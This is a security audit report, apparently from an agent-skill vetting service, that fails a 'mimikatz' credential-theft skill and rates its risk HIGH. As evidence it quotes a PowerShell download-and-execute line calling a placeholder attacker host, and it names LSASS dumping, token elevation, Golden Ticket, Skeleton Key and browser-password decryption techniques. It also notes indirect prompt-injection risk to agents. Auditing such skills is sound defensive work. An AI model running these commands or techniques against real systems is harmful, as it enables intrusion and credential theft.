skills/aeondave/malskill/mimikatz/Gen Agent Trust Hub

mimikatz

Fail

Audited by Gen Agent Trust Hub on Sep 15, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPRIVILEGE_ESCALATIONPERSISTENCECREDENTIALS_UNSAFEEXTERNAL_DOWNLOADSINDIRECT_PROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides instructions for downloading and reflectively executing code from external, untrusted sources using PowerShell.
  • Evidence: IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/Invoke-Mimikatz.ps1') in SKILL.md and references/credential-theft-tradecraft.md.
  • [COMMAND_EXECUTION]: The skill utilizes several system utilities and LOLBins to perform sensitive operations such as memory dumping.
  • Evidence: Use of mimikatz.exe, procdump.exe, rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump, and vssadmin in SKILL.md.
  • [PRIVILEGE_ESCALATION]: The skill documents methods for obtaining administrative privileges and bypassing system protections.
  • Evidence: Instructions for privilege::debug, token::elevate, and using the mimidrv.sys driver to remove protection from lsass.exe via !processprotect in SKILL.md.
  • [PERSISTENCE]: The skill provides instructions for establishing long-term persistence in a domain environment through forged Kerberos tickets and Domain Controller manipulation.
  • Evidence: Detailed sections on forging 'Golden Tickets' and patching Domain Controllers with a 'Skeleton Key' in SKILL.md.
  • [CREDENTIALS_UNSAFE]: The skill is primarily focused on the extraction of sensitive authentication material from system memory and protected storage.
  • Evidence: Instructions for dumping LSASS, SAM database, and decrypting DPAPI protected blobs for Chrome and Edge passwords in SKILL.md and references/credential-theft-tradecraft.md.
  • [EXTERNAL_DOWNLOADS]: The skill references the installation of external security packages from public registries.
  • Evidence: pip install pypykatz in references/credential-theft-tradecraft.md.
  • [INDIRECT_PROMPT_INJECTION]: The skill processes external data files such as browser database and credential blobs that could potentially contain malicious instructions.
  • Evidence Chain:
  • Ingestion points: Reading and decrypting browser login data and vault credentials in SKILL.md and references/credential-theft-tradecraft.md.
  • Boundary markers: None present to distinguish data from instructions.
  • Capability inventory: Extensive capabilities including file manipulation, token impersonation, and remote execution.
  • Sanitization: No sanitization of processed data is documented.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Sep 15, 2026, 09:56 AM
Security Audit — agent-trust-hub — mimikatz